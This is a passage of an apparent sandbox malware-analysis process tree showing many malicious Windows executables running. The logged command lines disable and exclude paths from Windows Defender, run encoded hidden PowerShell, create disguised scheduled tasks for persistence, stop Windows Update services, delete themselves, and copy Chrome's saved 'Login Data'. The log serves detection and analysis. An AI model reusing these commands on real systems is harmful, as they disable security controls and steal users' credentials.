        PID:7456
        
        C:\Users\Admin\AppData\Local\Temp\7zS5A07.tmp\Install.exe
        
        .\Install.exe /pdidc "385118" /S
        9⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        10⤵
        
        PID:8060
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        11⤵
        
        PID:7248
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        12⤵
        
        PID:5828
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        12⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        10⤵
        
        PID:2680
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        11⤵
        
        PID:5324
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        12⤵
        
        PID:4576
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        12⤵
        
        PID:1944
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gGOeWSJIo" /SC once /ST 12:37:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        10⤵
        Creates scheduled task(s)
        
        PID:380
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gGOeWSJIo"
        10⤵
        
        PID:1052
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gGOeWSJIo"
        10⤵
        
        PID:6232
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bFvsKFifcttmubYYTU" /SC once /ST 16:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\UEiTzwF.exe\" 1c /qQsite_idGIe 385118 /S" /V1 /F
        10⤵
        Creates scheduled task(s)
        
        PID:8904
        
        C:\Users\Admin\Pictures\snrfkxrn6lUrLWT7nmomX9dS.exe
        
        "C:\Users\Admin\Pictures\snrfkxrn6lUrLWT7nmomX9dS.exe"
        7⤵
        
        PID:5196
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        
        C:\Users\Admin\AppData\Local\Temp\Broom.exe
        8⤵
        
        PID:6580
        
        C:\Users\Admin\Pictures\S9mpDIFXFNdmJPNn460wDIeG.exe
        
        "C:\Users\Admin\Pictures\S9mpDIFXFNdmJPNn460wDIeG.exe"
        7⤵
        
        PID:6372
        
        C:\Users\Admin\Pictures\7E997n2xksJzZrB0Ey8Xms6K.exe
        
        "C:\Users\Admin\Pictures\7E997n2xksJzZrB0Ey8Xms6K.exe"
        7⤵
        
        PID:8828
        
        C:\Users\Admin\AppData\Local\Temp\7zSF068.tmp\Install.exe
        
        .\Install.exe
        8⤵
        
        PID:5436
        
        C:\Users\Admin\AppData\Local\Temp\7zS3716.tmp\Install.exe
        
        .\Install.exe /pdidc "385118" /S
        9⤵
        
        PID:6896
        
        C:\Users\Admin\Pictures\DxC5steR7tWZA7g067e5Iw2C.exe
        
        "C:\Users\Admin\Pictures\DxC5steR7tWZA7g067e5Iw2C.exe"
        7⤵
        
        PID:6976
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe
        
        "C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe" --silent --allusers=0
        7⤵
        
        PID:8960
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x310,0x314,0x318,0x2ec,0x31c,0x682b74f0,0x682b7500,0x682b750c
        8⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\X20MJOZYfeNJmZGE48gGNlpZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\X20MJOZYfeNJmZGE48gGNlpZ.exe" --version
        8⤵
        
        PID:7740
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe
        
        "C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8960 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231118162832" --session-guid=4afc20c9-444c-401f-af89-51ca00f6f647 --server-tracking-blob=NzE0ZDllZDFhZDIxYzU4NWJhOGY4ZjQ1NmU0MDY5M2JjMzAwMWZmMzBlNzRkNzVhMzAyMzdmMWM3NmQ1MzM3Nzp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDMyNDg1NC42NjE3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxMDc4MTNkZC05NDJkLTQxOGMtYWMzNC05MDYxMGM4Njc4YjkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C004000000000000
        8⤵
        
        PID:5072
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe
        
        C:\Users\Admin\Pictures\X20MJOZYfeNJmZGE48gGNlpZ.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x30c,0x31c,0x320,0x2e8,0x324,0x672074f0,0x67207500,0x6720750c
        9⤵
        
        PID:6108
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\InstallSetup2.exe" -Force
        6⤵
        
        PID:6716
    - - C:\Users\Admin\Desktop\a\xin.exe
        
        "C:\Users\Admin\Desktop\a\xin.exe"
        5⤵
        
        PID:5412
    - - C:\Users\Admin\Desktop\a\wininit.exe
        
        "C:\Users\Admin\Desktop\a\wininit.exe"
        5⤵
        
        PID:5584
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CBdqwn" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35D3.tmp"
        6⤵
        Creates scheduled task(s)
        
        PID:6468
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\CBdqwn.exe"
        6⤵
        
        PID:2776
      - C:\Users\Admin\Desktop\a\wininit.exe
        
        "C:\Users\Admin\Desktop\a\wininit.exe"
        6⤵
        
        PID:7296
    - - C:\Users\Admin\Desktop\a\putty.exe
        
        "C:\Users\Admin\Desktop\a\putty.exe"
        5⤵
        
        PID:4352
    - - C:\Users\Admin\Desktop\a\Protected.exe
        
        "C:\Users\Admin\Desktop\a\Protected.exe"
        5⤵
        
        PID:5704
    - - C:\Users\Admin\Desktop\a\gate3.exe
        
        "C:\Users\Admin\Desktop\a\gate3.exe"
        5⤵
        
        PID:684
    - - C:\Users\Admin\Desktop\a\plink.exe
        
        "C:\Users\Admin\Desktop\a\plink.exe"
        5⤵
        
        PID:6824
    - - C:\Users\Admin\Desktop\a\pablozx.exe
        
        "C:\Users\Admin\Desktop\a\pablozx.exe"
        5⤵
        
        PID:5476
      - C:\Users\Admin\Desktop\a\pablozx.exe
        
        "C:\Users\Admin\Desktop\a\pablozx.exe"
        6⤵
        
        PID:6116
    - - C:\Users\Admin\Desktop\a\s5.exe
        
        "C:\Users\Admin\Desktop\a\s5.exe"
        5⤵
        
        PID:7064
      - C:\Users\Admin\Desktop\a\s5.exe
        
        "C:\Users\Admin\Desktop\a\s5.exe"
        6⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "s5.exe" /f & erase "C:\Users\Admin\Desktop\a\s5.exe" & exit
        7⤵
        
        PID:8704
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "s5.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:5840
    - - C:\Users\Admin\Desktop\a\newumma.exe
        
        "C:\Users\Admin\Desktop\a\newumma.exe"
        5⤵
        
        PID:6496
    - - C:\Users\Admin\Desktop\a\ImxyQs.exe
        
        "C:\Users\Admin\Desktop\a\ImxyQs.exe"
        5⤵
        
        PID:6312
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        6⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\V02z6r.exe
        
        "C:\Users\Admin\AppData\Local\Temp\V02z6r.exe"
        6⤵
        
        PID:5932
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        6⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        7⤵
        Gathers network information
        
        PID:5180
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        6⤵
        
        PID:5420
    - - C:\Users\Admin\Desktop\a\damianozx.exe
        
        "C:\Users\Admin\Desktop\a\damianozx.exe"
        5⤵
        
        PID:520
      - C:\Users\Admin\Desktop\a\damianozx.exe
        
        "C:\Users\Admin\Desktop\a\damianozx.exe"
        6⤵
        
        PID:8332
      - C:\Users\Admin\Desktop\a\damianozx.exe
        
        "C:\Users\Admin\Desktop\a\damianozx.exe"
        6⤵
        
        PID:6668
    - - C:\Users\Admin\Desktop\a\laplas03.exe
        
        "C:\Users\Admin\Desktop\a\laplas03.exe"
        5⤵
        
        PID:5892
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Desktop\a\laplas03.exe
        6⤵
        
        PID:6408
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        7⤵
        
        PID:8488
    - - C:\Users\Admin\Desktop\a\Kriwgshughb.exe
        
        "C:\Users\Admin\Desktop\a\Kriwgshughb.exe"
        5⤵
        
        PID:6248
    - - C:\Users\Admin\Desktop\a\bin.exe
        
        "C:\Users\Admin\Desktop\a\bin.exe"
        5⤵
        
        PID:8108
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        
        PID:8444
    - - C:\Users\Admin\Desktop\a\BestSoftware.exe
        
        "C:\Users\Admin\Desktop\a\BestSoftware.exe"
        5⤵
        
        PID:8908
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        6⤵
        
        PID:4872
    - - C:\Users\Admin\Desktop\a\test.exe
        
        "C:\Users\Admin\Desktop\a\test.exe"
        5⤵
        
        PID:9136
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:620
    - - C:\Users\Admin\Desktop\a\Loader.exe
        
        "C:\Users\Admin\Desktop\a\Loader.exe"
        5⤵
        
        PID:8844
    - - C:\Users\Admin\Desktop\a\KiffAppU1.exe
        
        "C:\Users\Admin\Desktop\a\KiffAppU1.exe"
        5⤵
        
        PID:6480
    - - C:\Users\Admin\Desktop\a\BelgiumchainAGRO.exe
        
        "C:\Users\Admin\Desktop\a\BelgiumchainAGRO.exe"
        5⤵
        
        PID:4004
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        
        PID:6408
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        6⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 588
        7⤵
        Program crash
        
        PID:5888
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'BelgiumchainAGRO' -Value '"C:\Users\Admin\AppData\Local\BelgiumchainAGRO\BelgiumchainAGRO.exe"' -PropertyType 'String'
        6⤵
        
        PID:6620
    - - C:\Users\Admin\Desktop\a\defense.exe
        
        "C:\Users\Admin\Desktop\a\defense.exe"
        5⤵
        
        PID:4516
    - - C:\Users\Admin\Desktop\a\4XXR.exe
        
        "C:\Users\Admin\Desktop\a\4XXR.exe"
        5⤵
        
        PID:380
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12.bat" "
        6⤵
        
        PID:7584
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vbs.vbs"
        7⤵
        
        PID:8840
    - - C:\Users\Admin\Desktop\a\asas.exe
        
        "C:\Users\Admin\Desktop\a\asas.exe"
        5⤵
        
        PID:7732
      - C:\Windows\System32\werfault.exe
        
        \??\C:\Windows\System32\werfault.exe
        6⤵
        
        PID:2964
    - - C:\Users\Admin\Desktop\a\brg.exe
        
        "C:\Users\Admin\Desktop\a\brg.exe"
        5⤵
        
        PID:5292
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1044
        6⤵
        Program crash
        
        PID:7840
    - - C:\Users\Admin\Desktop\a\WatchDog.exe
        
        "C:\Users\Admin\Desktop\a\WatchDog.exe"
        5⤵
        
        PID:3356
    - - C:\Users\Admin\Desktop\a\a.exe
        
        "C:\Users\Admin\Desktop\a\a.exe"
        5⤵
        
        PID:2696
    - - C:\Users\Admin\Desktop\a\Update_new.exe
        
        "C:\Users\Admin\Desktop\a\Update_new.exe"
        5⤵
        
        PID:1540
    - - C:\Users\Admin\Desktop\a\TJeAjWEEeH.exe
        
        "C:\Users\Admin\Desktop\a\TJeAjWEEeH.exe"
        5⤵
        
        PID:2004
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        6⤵
        
        PID:7860
    - - C:\Users\Admin\Desktop\a\ghjkl.exe
        
        "C:\Users\Admin\Desktop\a\ghjkl.exe"
        5⤵
        
        PID:2968

C:\Windows\System32\sdiagnhost.exe
C:\Windows\System32\sdiagnhost.exe -Embedding
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:440
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\43iekgfg\43iekgfg.cmdline"
  2⤵
  PID:4240
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE61.tmp" "c:\Users\Admin\AppData\Local\Temp\43iekgfg\CSC37B59B963E874325A7FBA5B98ED00E9.TMP"
    3⤵
    PID:2256
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ndj2c5l5\ndj2c5l5.cmdline"
  2⤵
  PID:4372
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE0F1.tmp" "c:\Users\Admin\AppData\Local\Temp\ndj2c5l5\CSCF57051E959B74AA48BBEBDA43D62161.TMP"
    3⤵
    PID:2404
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hkcg0vmu\hkcg0vmu.cmdline"
  2⤵
  PID:2460
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE825.tmp" "c:\Users\Admin\AppData\Local\Temp\hkcg0vmu\CSC8AC534FE7272454E94F839BFB5DB26.TMP"
    3⤵
    PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 592
1⤵
- Program crash
PID:5456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
1⤵
PID:5208

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"
1⤵
PID:6968

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:6932
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5416
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6848
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:7800
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:7796
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:7132

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
1⤵
PID:3480

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
1⤵
PID:6036

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:6976

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:2416
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:8112
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:7964
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:8120
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7192

C:\Windows\SysWOW64\autofmt.exe
"C:\Windows\SysWOW64\autofmt.exe"
1⤵
PID:7764

C:\Windows\SysWOW64\wlanext.exe
"C:\Windows\SysWOW64\wlanext.exe"
1⤵
PID:7816
- C:\Windows\SysWOW64\cmd.exe
  /c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
  2⤵
  PID:6528
- C:\Program Files\Mozilla Firefox\Firefox.exe
  "C:\Program Files\Mozilla Firefox\Firefox.exe"
  2⤵
  PID:9084

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:7540

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:4452
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\AppData\Local\Temp\eslgt.exe"
  2⤵
  PID:7992

C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe
1⤵
PID:7052
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
  2⤵
  - Creates scheduled task(s)
  PID:7676

C:\Windows\SysWOW64\msdt.exe
"C:\Windows\SysWOW64\msdt.exe"
1⤵
PID:8568
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Desktop\a\pablozx.exe"
  2⤵
  PID:9148

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:9052

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:6980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:7880

C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
1⤵
PID:8768

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe
1⤵
PID:8456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7980

C:\Users\Admin\Desktop\a\newmar.exe
C:\Users\Admin\Desktop\a\newmar.exe
1⤵
PID:620

C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\zwZDlFG.exe
C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\zwZDlFG.exe 1c /fGsite_idNqU 385118 /S
1⤵
PID:7856
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
